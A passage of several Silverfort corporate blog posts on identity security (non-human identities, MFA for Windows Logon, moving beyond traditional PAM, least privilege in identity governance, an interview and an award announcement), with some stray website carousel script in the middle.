“messy middle” of the NHI lifecycle is generating additional risk for organizations.   Traditional Identity and Access Management (IAM) security tools like Privileged Access Management (PAM) and Multi-Factor Authentication (MFA) are inadequate to solve the security challenges that NHIs present. PAM is designed to manage human identities, and is not equipped to secure the dynamic, ephemeral nature of machine identities. Traditional MFA wasn’t designed for non-human identities, which can’t authenticate like humans because they’re automated systems and services. These legacy approaches to identity security cannot keep pace with the speed and complexity of today’s dynamic attack surface.   Further, we’ve seen a rise in niche startups that address only NHIs, or even just a specific part of the NHI problem—whether it's discovery, management, or governance. While these point solutions may seem appealing, they fail to address the full picture across human to non-human access for cloud to on-prem resources. Attackers will inevitably exploit the gaps between these solutions, leaving organizations vulnerable to compromise.   Non-human identities have already become a top attack vector. We’ve seen modern breaches originate from compromised tokens, service accounts, and unattended machine credentials — often bypassing traditional security controls entirely. Without visibility into their privilege levels and access patterns, these identities remain blind spots attackers exploit with ease.   The Solution: Silverfort’s NHI Security, Unified Coverage for Every Type of Identity, Everywhere  At Silverfort, we see this problem clearly. With the acquisition of Rezonate, we have built an NHI security solution to tackle the growing complexity of NHIs head-on. The very innovations that earned Rezonate the honor of being named one of “Gartner’s Cool Vendors in Identity-First Security” are now available in Silverfort’s NHI Security product. Today, we are introducing a unified NHI security offering that integrates identity security for both on-prem Active Directory service accounts and cloud NHIs. Silverfort’s NHI Security provides complete visibility, ownership mapping, and enables proactive protection for non-human identities across hybrid environments. It identifies behavior patterns, enforces access controls for on-premises service accounts to prevent anyone from using them outside of their intended purpose, and delivers actionable insights for cloud NHIs. This is the product the industry needs—one that covers everything from discovery and visibility to proactive protection and risk-driven decision-making. One that addresses NHIs within the broader identity security context and protects both human and non-human identities in a unified manner. No more fragmented, siloed solutions. No more gaps for attackers to exploit. What We’re Announcing: Expanding Coverage to Cloud NHIs  Today, we are expanding our platform to provide comprehensive coverage for cloud-based NHIs across all major cloud identity providers, cloud infrastructure providers, and SaaS applications. For years, Silverfort has been the leader in securing on-prem Microsoft Active Directory (AD) service accounts, providing unparalleled visibility and protection to many of the world’s leading enterprises. Now, we bring that same level of depth to cloud NHIs, connecting the dots between human identities and their non-human counterparts, giving organizations the comprehensive visibility needed to make informed, proactive security decisions.   Addressing the Challenges: Why Silverfort’s Solution Is the Future of NHI Security  Unified coverage for both on-prem and cloud NHIs: Most vendors treat on-prem and cloud NHIs as separate problems. We don’t. Our platform integrates both, providing a unified security posture that extends from cloud to ground. No more silos, no more fragmentation. Whether it’s a service account on AD or an API key in AWS, we take care of their security seamlessly.   Complete discovery and ownership mapping: We understand the critical need for visibility into both NHIs and their owners. Traditional tools leave ownership tracking to guesswork, making it impossible to secure these identities effectively. At Silverfort, we map every identity—human and non-human—to its owner, providing the visibility needed to protect them. You cannot separate NHIs from human identities—they are created, maintained, and operated by people, and their actions directly affect human-managed systems and vice versa.   Real-time protection of service accounts: We go far deeper in visibility and protection than any other vendor when it comes to the on-prem AD service accounts. Real-time enforcement of virtual fencing blocks any use of the account outside of its intended purpose, making lateral movement impossible. Our Smart Policy capability simplifies enforcement at scale across large, complex environments with a single click. Seamless integration across platforms: Our platform is built to integrate with existing infrastructures, whether on-prem or in the cloud. From AD to Entra ID, from AWS to Azure, from GitHub to Snowflake, we provide cross-platform protection that spans hybrid environments, ensuring that no identity is left unprotected.   let currentIndex = 0; const slides = document. querySelectorAll('. carousel-images img'); const dots = document. querySelectorAll('. carousel-dots span'); function showSlide(index) { const imagesContainer = document. querySelector('. carousel-images'); if (index >= slides. length) currentIndex = 0; else if (index < 0) currentIndex = slides. length - 1; else currentIndex = index; imagesContainer. style. transform = `translateX(-${currentIndex * 100}%)`; dots. forEach((dot, i) => { dot. style. background = (i === currentIndex) ? 'black' : 'gray'; }); } function nextSlide { showSlide(currentIndex + 1); } function prevSlide { showSlide(currentIndex - 1); } function goToSlide(index) { showSlide(index); } // Autoplay every 3 seconds setInterval(nextSlide, 3000); // Initialize first slide showSlide(currentIndex); The Future of Identity Security: Transformation and Innovation  At Silverfort, we’re not just responding to the latest trends; we’re shaping the future of identity security. We’re building an end-to-end platform that protects every type of identity, no matter where they originate or if they are human or not, offering unparalleled visibility, analysis and control across your entire ecosystem. As identity becomes the focal point in the security stack, our platform will continuously evolve to meet the demands of the market. We will continue to innovate, bringing new capabilities like behavioral monitoring, threat modeling, and event filtering to ensure that identities—whether human or machine—remain protected. In a world where identity is the new perimeter, machine and human identities are inseparable. Silverfort is leading the way in securing this interconnected reality—making sure every identity in your ecosystem is visible, understood, and protected.   Join us in reshaping the future of identity security. Learn more about Silverfort’s NHI security product here.   --- - Published: 2025-04-24 - Modified: 2025-06-05 - URL: https://www.silverfort.com/blog/enforcing-mfa-for-windows-logon-local-endpoints-virtual-desktops-and-servers/ Do you know how many Windows Logon authentications happen on a daily basis? Hundreds of thousands of employees globally use it to access their laptops, desktops, and virtual environments to perform work operations every single day. However, despite widespread adoption of Multi Factor Authentication (MFA) for cloud applications, this critical layer often remains unprotected.   Despite this security challenge being well known, the true reason lies in how difficult it is to enforce MFA across different types of environments. Native solutions, like Windows Hello for Business, can require additional infrastructure, while many virtual desktop platforms often lack any built-in MFA support. In OT and remote locations, enforcing MFA can be even more challenging due to limited connectivity or the inability to use mobile devices.   In this blog, we’ll explore why enforcing MFA for Windows Logon is so challenging and how Silverfort for Windows Logon solution helps overcome these gaps. Before any work begins: The first step is Windows Logon  We typically see two primary types of Windows Logon in organizations: local Windows Logon and Virtual Desktop Logon:  Local Windows Logon  This is the process of signing in directly to an individual Windows machine using either a local or domain-based account. It’s commonly used on individual devices, work laptops, shared terminals in retail or healthcare industries, and computers in OT environments. These machines often operate outside the visibility of centralized identity systems, including Active Directory (AD) or modern IdPs.  As a result, MFA enforcement is highly inconsistent, especially for local accounts that aren’t connected to any domain, exposing these machines to credential compromise. Virtual Desktop Logon  In this process, users authenticate into virtual environments like Azure Virtual Desktop, Citrix, or Remote Desktop Protocols (RDP) sessions. While these environments are managed centrally, the initial logon process still relies on Windows authentication layer before any MFA takes place. Many virtual desktop infrastructures don’t support native MFA at this stage, creating a security gap that attackers can exploit during remote access. Without MFA enforcement, organizations leave critical data and applications exposed to attackers connecting from unmanaged or external devices.   Why enforcing MFA for Windows Logon isn’t so simple  Enforcing MFA across Windows Logon may seem straightforward, but in practice it isn’t just a technical checkbox for security teams. While SaaS applications, cloud workloads and VPNs can be protected with centralized identity providers (IdPs), Windows Logon is often left behind—unmonitored and unprotected. Unlike cloud applications that rely on centralized SSO platforms, Windows Logon authentication occurs on the endpoint level where MFA enforcement and visibility depend on the underlying infrastructure. In many cases, especially with local or offline machines, this makes it difficult for security teams to apply consistent policies or track authentication activity.   It introduces a different set of challenges based on additional infrastructure requirements, lack of native support for virtual environments, and the reality of offline user scenarios.  With these risks in mind, attackers often look for Windows Logon authentication presence in the environment to compromise credentials and start moving laterally with privilege escalation afterwards.   Let’s take a closer look at why protecting Windows Logon with MFA is harder that it seems.   Additional infrastructure requirements: a barrier for deployment Protecting Windows Logon with MFA often requires the deployment of additional infrastructure, including certificate-based authentication, public key infrastructure (PKI), or biometric devices enrollment. These components increase the complexity of setup and limit the ability to scale MFA across diverse environments. For organizations with limited workforce or no existing certificate infrastructure, this becomes the bottleneck that either delays or completely prevents any MFA enforcement. As a result, critical authentication layer left exposed because cost and effort of deployment are too high.   Lack of native support in virtual environments: a security gap for remote access  In virtual desktop environments MFA enforcement is often missing at the initial identity layer. These platforms may support MFA at later stages, such as application access or session initiation, and this creates a blind spot where users can authenticate to the desktop without any additional verifications. For attackers, this is a critical gap in remote access scenarios, allowing credential-based compromise or lateral movement without any MFA trigger.   Offline and OT environments: no connectivity, no MFA  In many organizations, Windows machines operate in environments where network connectivity is limited or restricted. These include OT systems in factories, industrial control rooms, warehouses, and remote field sites. Within these environments, employees cannot use any traditional MFA methods, including push notifications. As a result, Windows Logon authentications remain completely unprotected and unobserved, leaving critical resources open to compromise. These challenges leave the Windows Logon layer exposed, making it a prime target for identity-based attacks. That’s why, for many organizations, enforcing MFA at this layer is no longer optional. Cyber insurance policies and compliance frameworks, like CJIS, now require secure authentication at the machine level to protect sensitive data.   How Silverfort extends MFA for Windows Logon  Silverfort allows organizations to enforce MFA across all types of Windows Logon scenarios without requiring additional infrastructure deployed in the environment. By integrating directly at the authentication protocol level, Silverfort applies MFA in real time to both domain-based and local authentications, whether on a physical device, a virtual machine or an offline system.   Let’s explore how Silverfort helps organizations address different use cases of Windows Logon authentication.   Enforcing MFA for Local Windows Endpoints  Silverfort for Windows Logon (S4WL) provides access control and real-time risk analysis for all Windows endpoints to allow users authenticate to the domain of local AD or Microsoft Entra ID. When a user attempts to log in, Silverfort evaluates the request through its policy engine and can trigger a push notification via Entra ID, ensuring the user’s identity is verified before access is granted.   Video: Example of Windows Logon authentication on the local endpoint with Silverfort triggering a push notification via Entra ID.   Protecting Virtual Desktop Logon  Silverfort secures RDP sessions by enforcing MFA directly at the Windows Logon layer. In this configuration, when a user initiates an RDP connection, they are prompted to enter one-time passcode (OTP) that provides an additional identity layer of verification before granting access to remote machines or servers.   Video: Example of RDP session protection at the Windows Logon layer with Silverfort triggering an OTP.   Securing offline and OT environments  In environments where internet connectivity is limited or unavailable, such as OT systems in factories or field sites, Silverfort supports offline Windows Logon by evaluating authentication attempts locally and prompting users to authenticate with a FIDO2 hardware token or a TOTP code.   Video: Example of offline Windows Logon authentication process with Silverfort prompting of FIDO2 hardware token. Preventing identity-based attacks from the first login  Windows Logon is one of the most common first access points used across any organization. Without protection at this critical layer, attackers can easily exploit credentials to move laterally and escalate privileges undetected. Silverfort helps close this blind spot by enforcing strong MFA controls on the login authentication process. With end-to-end visibility into every authentication attempt and policy-based access control, Silverfort can finally help security teams prevent identity-based attacks.   Looking to secure your Windows Logon authentications? Schedule a call with one of our experts to see how Silverfort can help you secure your environment.   --- - Published: 2025-04-16 - Modified: 2025-04-16 - URL: https://www.silverfort.com/blog/the-inevitable-decline-of-traditional-pam/ Traditional PAM solutions have dominated the market for years—but the truth is, you probably don’t need one to cover the most common privileged access use cases in your environment. PAM solutions tend to be complex, time-consuming to implement, and difficult to enforce. Their workflow changes for users like IT admins and developers often lead to frustration—and creative ways to bypass them. This leaves your critical users open to compromise until your PAM project is fully deployed. Even traditional PAM vendors are waking up to this reality and are thinking about shifting away from their vault-centric solutions to a more dynamic and modern approach to securing privileged users. Why? The old approach of vaulting every user simply isn’t needed anymore. It’s time to be more security proactive and embrace approaches and solutions designed for today's threats.   In this blog, we'll explain why organizations are abandoning traditional PAM offerings in favor of a more modern approach to identity security. Why traditional PAM is falling out of favor For years, PAM solutions excelled at correlating multiple users into a single generic or shared account while enforcing session recording through a session proxy. This approach made sense in an era where the built-in admin account was the default for managing assets. But things have changed. With today’s hybrid environments and evolving threat landscape, traditional PAM best practices are not up to par with modern security demands.   This is due to:  Compatibility issues with AD tiering: Accessing a privileged tier via PAM from a less privileged endpoint breaks the AD tiering model, while PAM proxy access, which fetches credentials from a vault without reaching the endpoint, offers a secure, tier-compliant solution. It does, however, impair the effectiveness of traditional PAM solutions. A dedicated PAM deployment for each tier in the tiering model, accessed from a Privileged Access Workstation (PAW) for that tier, is the only compliant method but has very little added value as it is only really needed for session recording or tracking access to shared accounts. This makes it an unappealing proposition considering the extra infrastructure and management overhead.   Ineffectiveness of session recording: While session recording may seem like an effective solution for auditing, it’s mostly overkill for PAM admins using this capability. With proper logging configured on the resource being managed, session recording becomes unnecessary. Furthermore, most organizations don't have the dedicated time and resources to review these recordings, reducing their value to the occasional post-breach analysis during incident investigations.   Limited coverage: PAM solutions focus on securing known privileged users but fail to address unmonitored accounts, leaving organizations exposed to blind spots. Discovery capabilities often rely on naming conventions and group memberships, but they cannot detect bypass accounts deliberately designed to remain hidden and used by IT admins to evade PAM controls. Additionally, desktop users (tier 2), who frequently log in directly with passwords, face the highest risk of compromise and cannot be adequately protected by a password vaulting approach. Unmanaged NHI access: Many privileged machine accounts operate without direct interaction through session proxies, leaving PAM unable to enforce real-time visibility and security controls on these accounts. Instead, it relies on password rotation via APIs and limited activity log analysis. This lack of proper discovery means organizations cannot fully understand where the NHI is being used, while credential rotation risks disrupting systems. As a result, many organizations avoid managing NHIs through their PAM, further exposing these accounts as a security blind spot.   Personal admin account oversight: Auditors and regulatory standards recommend using personal admin accounts for clear accountability by correlating recorded actions with individual users. While PAM solutions can track the use of shared admin accounts and link them to specific users, personal accounts provide greater security as access remains limited to fewer individuals. Additionally, shared accounts can be problematic when employees leave, often leading to revoked access gaps. PAM struggles to manage personal accounts under the vault model. Traditional PAM practices are outdated and incompatible with the complexities of modern security environments. Faced with the different challenges and security blind spots discussed above, organizations are now actively transitioning beyond traditional PAM approaches in favor of a more effective approach tailored to meet today's security demands with far greater efficiency.   The modern approach to securing privileged users  Traditional PAM was designed with a straightforward approach: secure privileged credentials in a vault, log their use, and rely on the assumption that attackers would be deterred. This strategy was effective in an era of static environments and centralized on-prem infrastructure, when privileged users were limited to a small group of IT admins. But today’s identity landscape is dynamic, distributed, and cloud-native. Privilege is everywhere—across thousands of identities, machines, and services—and it no longer fits in a vault.   Instead, we need a modern approach to PAM that moves beyond vaults and focuses more on identity, access, and context in real time. It should be designed to provide continuous visibility into who (or what) has privileged access at any given moment, detect when that privilege is being used, and enforce security controls dynamically—regardless of where the access happens, what credentials are used (if any), or what platform it's on.   Visibility: Mapping the true attack surface  Visibility lies at the heart of securing privileged access. Achieving effective privileged access management requires a continuously updated, comprehensive view of all identities—human and non-human—that possess or can escalate to elevated privileges. This includes not only traditional admin accounts but also delegated access through group memberships, inherited IAM roles, cloud-native permissions, and service accounts embedded in automation pipelines or scripts.   The reality of today's threat landscape is stark: attackers no longer need to breach the vault if they can exploit a cloud workload identity with admin-level API privileges. As a result, mapping and managing the complete privilege attack surface is essential for proactive security and risk reduction.   Real-time enforcement across all access paths  Unlike traditional PAM, which responds only after the fact, this new approach to privileged access should be built with real-time security controls. By directly integrating with authentication protocols—such as Kerberos, NTLM, LDAP, SAML, and more—it should detect privilege escalation instantly and enforce controls proactively, before any session starts.   This proactive approach can trigger MFA, block risky access requests based on contextual signals, or dynamically enforce session boundaries to restrict misuse. Instead of relying on session logs for post-incident reviews, it would disrupt threats at the point of access, ensuring misuse is prevented rather than simply documented.   Enforcing the Least Privilege model  Continuous enforcement of least privilege is an essential component of this new approach. Instead of relying on static role assignments in the hope that they won't be compromised, a modern PAM solution should continuously analyze behavior, usage trends, and entitlements to identify and eliminate excessive privileges.   Leveraging role-based and attribute-based access controls, permissions are precisely tailored and minimized—even for service accounts and other machine accounts. When anomalies arise, they are swiftly detected and addressed in real time, with security controls enforced and risk mitigation measures promptly implemented.   Just-in-Time access: Kill standing privilege  To truly minimize risk, this approach should enforce Just-in-Time (JIT) access. Instead of granting standing privileges, users elevate access only when needed, through time-bound approvals or automated workflows.   Once the task is done, the privilege is revoked automatically. This minimizes the window of opportunity for attackers and limits the blast radius if an account is compromised. JIT access ensures temporary and traceable privileges, reducing lateral movement attacks.   Going beyond the vault  This new and modern approach to securing privileged access is not about where credentials are stored—it's about how privilege is discovered, monitored, and controlled across your entire ecosystem. It’s a fundamental shift away from the outdated practice of vaulting all users, which introduces complex and long deployment of security controls and fails to address modern security challenges.   Instead, the focus is on dynamic and real-time management of privileged access, enabling tailored access controls without the need for complex vaulting users. It’s a huge step in the right direction from a preventive approach to more proactive real-time security enforcement, built to navigate the complexity of the current identity infrastructures and counter the attack landscape. Even traditional PAM solutions are evolving to adopt these advanced practices, better aligning with organizational needs in a fast-changing security landscape.   To learn how Silverfort’s Privileged Access Security (PAS) can help you change the way you secure privileged access, download our securing privileged access eBook or contact one of our experts today.   --- - Published: 2025-04-07 - Modified: 2025-04-07 - URL: https://www.silverfort.com/blog/reflections-from-the-identity-frontline/ Over the last eight years, I’ve had the unique challenge of building and maturing an Identity and Access Management (IAM) program from the ground up for a large multi-national retailer with an extremely complex hybrid environment. On day one, it was just me, a laptop, and a myriad of challenges. The scale was staggering—thousands of business applications, tens of thousands of servers, nearly half a million employees worldwide, and a vast attack surface to secure with limited resources. Despite our best efforts, we constantly discovered new security risks, underscoring the dynamic nature of our identity security.   Building a strong IAM foundation  Freedom from heavy regulation allowed me and my team to design an IAM program tailored to our unique security needs. We set to building the foundations of a successful IAM program— strong, highly automated access management for millions of accounts and their access privileges which were rooted in a comprehensive inventory of identities. We implemented single sign-on (SSO) protected with multi-factor authentication (MFA) for hundreds of applications and developed technology for secure password reset deeply tied to HR processes.   Despite these efforts, we were never fully comfortable. It seemed that behind every door we opened, we found new risks. Identity security felt like an endless cycle of plugging gaps while new ones appeared. Given the complexity of modern IT environments, even the most seemingly innocent account could become an entry point for attackers.   Through this experience, I developed a guiding principle: security is a game of space and time. The goal is not to implement security gradually, but to make strategic investments in solutions that mitigate multiple risks at once, allowing security teams to stay ahead of threats without being buried in complexity.   Creating space and time  Traditional security improvements often involve small steps that each take a significant amount of time and resources while only addressing a small portion of the problem; for example, the use of SSO or the implementation of Identity Governance and Administration (IGA) for business applications. No single initiative can reduce identity risk to an acceptable level. In each case, they are applied incrementally without achieving any wider benefit, and all of them require a great deal of time and resources to implement.   My challenge was to find the right investments to prevent my team from having to work through complex, deeply technical, incremental work in plain sight while running with unacceptable levels of identity risk. We needed to shift the focus from individual use cases and incremental fixes to investments that solve specific problems while also providing a broad scope of protection and scalability—in other words, investments that create space and time for our teams. The question is: how do we secure identity quickly without getting lost in complexity?   To answer this, I believe you need to take a three-part approach to achieve complete identity security protection across your organization.   A game of ceilings and floors: Raising the baseline of security  As an avid sports fan, I often draw parallels between identity security and team sports. In sports, a team’s success is rarely determined by its best players; instead, it hinges on the performance of its weakest link. The ‘ceiling’ of a player represents their maximum potential performance, while the ‘floor’ is their worst performance level.   Identity security follows the same principle: organizations must first raise their security floor before aiming for their ceiling. So, instead of focusing solely on high-end protections for select systems, the priority should be building broad, foundational security that addresses common attack vectors and security risks.   In practice, this means implementing strong security controls and ensuring up-to-date IAM best practices are being followed by all user accounts and resources within the organization. By establishing this baseline, organizations create a resilient foundation that mitigates the most significant threats and reduces overall risk.   It’s only after this baseline of protection has been established that security leaders can focus on elevating the ceiling with more advanced protections. As a result, high-leverage security investments that address multiple risks simultaneously can provide a multiplier effect on ROI.   By prioritizing broad, foundational security and leveraging investments that offer multiple benefits, organizations can create a comprehensive and scalable security strategy. This approach ensures that no account, no matter how “insignificant”, is left vulnerable to compromise and the entire organization is better protected against evolving threats.   Using leverage to your advantage  Not all security investments deliver the same value. Some controls solve isolated problems, while others create leverage by mitigating adjacent risks. High-leverage investments provide a multiplied return, reducing the urgency of solving related risks.   In my experience, protecting all server authentication with MFA or usage restrictions (e. g. , limiting service accounts according to source and destination) mitigates a host of password-related and access management risks. Poor-quality passwords, uncertainty about where your passwords are stored or written down, lack of rotation for non-human identities, and concerns about overprivileged accounts—all of these will be less urgent problems to solve if you have proper authentication protection in place.   On the flip side, preventing passwords from being stored insecurely is an incremental, difficult problem that cannot be solved with leverage. A password may be found in a file on a computer, in a cloud storage account, in a file share, etc. Solving this problem alone requires considerable effort and does not mitigate other, equally pressing risks. Even if a password is stored securely, it is still at risk if it is low quality.   Finding investments with leverage reduces the urgency of the technical risks they mitigate; they buy space and time for your team to build your security ceiling.   Broad protection matters  There is a well-known story from a red team exercise that illustrates a crucial point: to breach a high-security data center, an ethical hacker found a robust, access-controlled door. Instead of attempting to bypass it, they ran through the plasterboard wall adjacent to it.   This story made me think about how attackers are like water; they will always find the lowest level. The adversary will simply pivot to lower-hanging fruit if an organization restricts its security efforts to a limited number of systems or accounts. Most cyber-attacks are financially motivated and opportunistic; they are not personal.   Considering how complex and connected our systems are today, we cannot assume that any account, no matter how innocent-looking, is safe or too low priority for protection. The key to scalability is to assess investments for their ease of scaling.   Platforms that enable an easily manageable control plane are more scalable than incremental, decentralized controls. Strong security controls that cannot be implemented at a scale create a weak foundation. To achieve scalability, a comprehensive approach is necessary to close these gaps efficiently.   A balanced approach to identity security  Identity security leaders have complex and demanding roles. Building a broad security floor while prioritizing investments that buy your team space and time can help. Balancing this way of thinking with compliance requirements, which by their very nature encourage selectively building high security ceilings, will go even further to protect your environment. In fact, I believe this balancing act is the only effective method of reducing risk in today's environments. It is important to prioritize investments that provide leverage, broad coverage, and centralized control to reduce risk at scale. Keeping these principles in mind will allow organizations to secure identity efficiently and stay ahead of evolving threats without drowning in complexity.   For security leaders, the challenge is clear: build a strong foundation, invest in scalable security solutions, and ensure your security efforts buy the time and space needed to stay ahead of the identity threat landscape. --- - Published: 2025-03-27 - Modified: 2025-03-31 - URL: https://www.silverfort.com/blog/its-the-identity-stupid-a-conversation-with-identity-security-expert-abbas-kudrati/ I sat down with Abbas Kudrati, APAC Chief Identity Security Advisor at Silverfort, to discuss the most pressing identity security trends shaping 2025 and what C-suite leaders need to know to protect their organizations.   Your new lecture title "It's the identity, stupid" grabs attention immediately. What inspired this?   Abbas: Well, I borrowed from James Carville's famous 1992 Clinton campaign message, but with a cybersecurity twist. The reality is that in today's world, identity isn't just one component of security, it's the fundamental pillar. Your firewall isn't your first line of defense anymore; your identity infrastructure is. Organizations that haven't grasped this are fighting today’s battles with yesterday’s weapons.   What has changed in the security landscape that has made identity so central?   Everything has been turned inside out. The internet is the new network, the cloud is the new data center, and identity is the new perimeter. Any device can be a work device now, and effectively, every company has become an IAM company whether they realize it or not. What's particularly concerning is that non-human identities now outnumber human identities by 25-50 times. In 2010, humans dominated the identity landscape. By 2020, non-human identities were 10x more numerous, and by 2025, with GenAI, LLMs, and copilots, they're projected to be 50x more numerous. That's a massive attack surface that most organizations aren't securing properly.   Your research highlights significant concerns about non-human identities. Why should executives care about this specifically?   Because it's a ticking time bomb. According to Cloud Security Alliance research, only 15% of organizations feel highly confident in preventing NHI attacks, while 69% are concerned about them. Only 20% have formal processes for offboarding and revoking API keys, and even fewer rotate them regularly.   The most alarming part? Service accounts, which often hold extensive privileges, frequently lack robust visibility. If these machine identities are compromised through configuration files or code repositories, it can lead to extensive business disruption.   As organizations harden user policies, attackers are increasingly targeting applications instead. The problem? Applications can't use MFA or remember credentials like humans can, and developers often want all the privileges they can get. It's a perfect storm.   Gartner recently named managing machine identities as one of the top cybersecurity trends for 2025. What's driving this focus?   Reality is catching up with the threat landscape. The OWASP Top 10 Non-Human Identity Risks for 2025 highlights critical issues like improper offboarding, secret leakage, vulnerable third-party NHIs, and overprivileged NHIs.   As more companies adopt Zero Trust principles, attackers are evolving their strategies. Rather than trying to circumvent identity infrastructure, they're working to subvert it. This requires breaking down the traditional walls between identity and security teams, something many organizations still struggle with.   Let's discuss AI's role in identity security. How is it changing the landscape?   It's a double-edged sword. Forward-thinking organizations are leveraging AI to transform identity operations, from discovering hidden entitlements to predicting risks and optimizing access policies. This represents a fundamental shift from reactive to predictive security.   But AI is also empowering attackers. We're seeing increasingly sophisticated automation of identity-based attacks, particularly in permission mining and lateral movement. After gaining initial access, threat actors can now systematically explore and exploit identity permissions, especially in cloud environments, often finding subtle paths to higher privileges that might not trigger alerts.   What are the most significant identity-based threats in 2025?   I categorize them into three main threats:  First, "Ungovernable Users". The reality is that users can't be trained to deal with sophisticated attacks like session-cookie theft, adversary-in-the-middle phishing, or MFA fatigue. The high frequency of user failures overwhelms SOC resources. Organizations need to make security flows failure-proof.   Second, "Ungoverned Applications”. As organizations harden user policies and infrastructure, attackers shift to applications. The strategy here needs to be strict application controls, compliance checks, and credential scanning in real time.   Third, "Subverted Infrastructure". As Zero Trust adoption increases, attackers are working to subvert rather than circumvent identity infrastructure, exploiting trust relationships between identity providers and service providers.   You've developed a strategic matrix for identity security investments. Can you explain how executives should approach this prioritization?   The Identity Security Matrix helps executives allocate resources across four strategic priorities. Zero Trust Architecture and AI Integration offer the highest strategic value, though they differ in implementation complexity. Zero Trust Architecture provides high strategic value with relatively low implementation challenges, while AI Integration is just as important but requires more complex implementation.   Industry Consolidation, while complex to navigate, carries lower strategic weight for most organizations. Workforce Challenges require ongoing attention but shouldn't divert resources from more critical initiatives.   What practical steps should C-suite leaders take to strengthen their identity security posture?   Six critical actions:  First, implement strategic access controls, especially Just-In-Time access for sensitive operations.   Second, tighten authentication requirements with robust MFA for both internal access and service-to-service authentication.   Third, strengthen identity security testing to include scenarios like permission chain exploitation and SSO trust relationship vulnerabilities.   Fourth, advance identity governance with regular permission reviews to limit breach impact.   Fifth, transform security operations with identity as the cornerstone, implementing real-time verification.   Finally, establish machine identity governance with dedicated oversight committees for these critical business assets.   For organizations still early on in their identity security journey, what's the one thing they should focus on first?   Start by understanding your identity landscape, particularly your non-human identities. You can't secure what you can’t see—or don’t even know about. Most organizations have hundreds or thousands of service accounts, API keys, and machine identities operating with excessive privileges and insufficient oversight. A comprehensive identity inventory, especially of non-human identities, is the foundation everything else builds upon.   What is one key piece of advice for security business leaders that you would share with our readers?   Identity security needs to evolve from a technical initiative to a business-critical priority. The C-suite must drive this transformation through strategic investment and attention. Companies that recognize "it's the identity, stupid" and act accordingly will be far more resilient against the sophisticated threats of 2025 and beyond.   Want to learn more about protecting your organization's identity infrastructure? Visit Silverfort's Platform page to explore our Identity Security platform, or take a product tour. --- - Published: 2025-03-20 - Modified: 2025-03-20 - URL: https://www.silverfort.com/blog/who-governs-the-governance-why-the-least-privilege-model-is-key-to-securing-iga/ IGA tools allow organizations to manage who has access to what. IGA's primary focus is on business outcomes and operational efficiency—priorities that may not always align with security needs. In the pursuit of maximizing efficiency, it's easy to miss potential attack vectors.   Employees often switch roles and keep access to resources they no longer need or leave their jobs entirely while their accounts remain active. That's not only inefficient and redundant—it also gives attackers a way in.   In this blog, we'll discuss what it means to secure IGA and ensure governance processes do not introduce security risks such as excessive, outdated or misused privileges. We'll then dive into why the principle of least privilege is crucial to prevent them, and who should be involved in the process (spoiler alert: it's the security team).   The risks of excessive access  Overstaying your welcome: Permissions that stick around come back around  Sometimes we accumulate things we don't really need, and luckily for attackers, user permissions are one of those things. In the long run, excessive and unused permissions can significantly expand an organization’s identity attack surface without anyone even knowing it—until something goes wrong. IGA assigns access but doesn’t always revoke it. The first thing to do is know what is actually being used rather than assuming users need all the privileges they were given. If a permission has not been used in months, does it really need to exist?   Forget about it: Stale users are still users  Employees leave, contracts end, people move on to their next adventure. It's all part of corporate life. Their accounts, however, should leave and never return. Similarly, when people change roles or move to other departments, their old permissions remain intact until someone actively removes them, which often takes a while. After all, what's the harm? They’re still part of the company. These stale users and their permissions are easily forgotten—and even easier to exploit in the wrong hands. Truth be told: Compliance alone does not guarantee security  Periodic access reviews are a compliance requirement, but compliance doesn’t always equal security. Security risks change constantly, and keeping track of what permissions have been granted and how they are actually being used in real time is crucial to blocking malicious access attempts and attacks before they can do damage. From identity governance to identity security governance  Keeping tabs: Make sure users with access are actually using it  Organizations should continuously analyze access patterns and proactively remove unused permissions using real-time analytics and automated removal mechanisms. Implementing these measures will eliminate the accumulation of unnecessary access, mitigate insider threats, and prevent lateral movement before it develops into a security incident.   We’re only human: IGA is not focused on NHIs, but you should be  IGA is almost entirely focused on human identities, even though non-human identities, such as service accounts, are equally prevalent and can even be more dangerous in the wrong hands. NHIs often possess excessive privileges because that's what they're created to do—perform tasks not usually allowed with basic permissions. Organizations that don't have full visibility and control over their service accounts' privileges and usage face serious security risks.   You get what you need: Always follow the principle of least privilege  Finding out whether users are actually using their access privileges isn't enough. Security is about knowing and managing risks, and while IGA tools do not inherently provide a security layer, they hold an important piece of the identity security puzzle. When properly integrated with security strategies, they can play a crucial role in reducing identity risks and improving overall identity security posture.   Privileges should always be kept to a minimum, and the risk associated with each entitlement should always be carefully evaluated and prioritized. The principle of least privilege should be the standard for security teams, not just as a one-off project but as a way of life.   Final thoughts: Achieving and maintaining least privilege  IGA plays a critical role in managing identities, but it wasn’t built to enforce security. So how can you achieve least privilege? Just remember to follow these steps and you’ll be good (if not better! ):  Move from periodic reviews to continuous validation. Annual or quarterly access reviews aren’t enough: security teams need real-time insights into excessive permissions and the ability to act immediately. Automate the removal of unused access. Manually removing old permissions isn’t scalable, but automating this process helps enforce least privilege without adding unnecessary workload. Align security with IGA. IGA provides governance, but security needs visibility into how access is actually used. Integrating the two ensures governance decisions are based on security needs. Continuously monitor access behavior. Tracking access activity in real time helps detect anomalies and remove permissions before they become a problem. Remember: attackers don’t need fancy software vulnerabilities when excessive access is already out there. It is so much easier to simply log in using some old compromised credentials—especially when they have lots of access privileges. By combining identity governance with identity security posture and real-time monitoring and enforcement, organizations can make sure users only have the access they actually need, thereby shrinking their identity attack surface and limiting lateral movement.   --- - Published: 2025-03-18 - Modified: 2025-03-19 - URL: https://www.silverfort.com/blog/silverfort-named-a-fast-company-most-innovative-company/ The World’s Most Innovative Companies Award by Fast Company is the definitive source for recognizing organizations that transform industries and shape society. Today, we’re celebrating that Fast Company has named Silverfort a 2025 Most Innovative Company. We are honored to be listed in the security category alongside others who are pushing the boundaries of what’s possible to create a more secure world.   More than 1,000 enterprises trust Silverfort, and our gross customer retention rate remains high at 94%. We’ve raised more than $220M in funding from leading investors, and we’ve grown to over 450 team members worldwide, with revenue increasing by nearly 100% year over year for the last five years. The entire Silverfort team deserves this honor for working tirelessly to build a platform that delivers maximum security with minimal effort. Thank you to our employees, customers, and investors for all your hard work, loyalty, and unwavering support. And special thanks to our incredible Research, Engineering and Product teams for continuously delivering unmatched innovation that pushes the identity security market forward.   2024 was a big year for Silverfort. In the last six months alone, we acquired Rezonate, an impressive cloud identity security company, we released an incident response solution that flips the script on the traditional IR process, and our product team released an entirely new product—one that helps businesses go beyond managing privileged accounts to securing them (Privileged Access Security). We can proudly say our platform analyzes over 10B authentications daily, detects an average of 34K identity exposures and threats per customer, and is 17 times faster to deploy than traditional solutions. Silverfort’s journey began with a 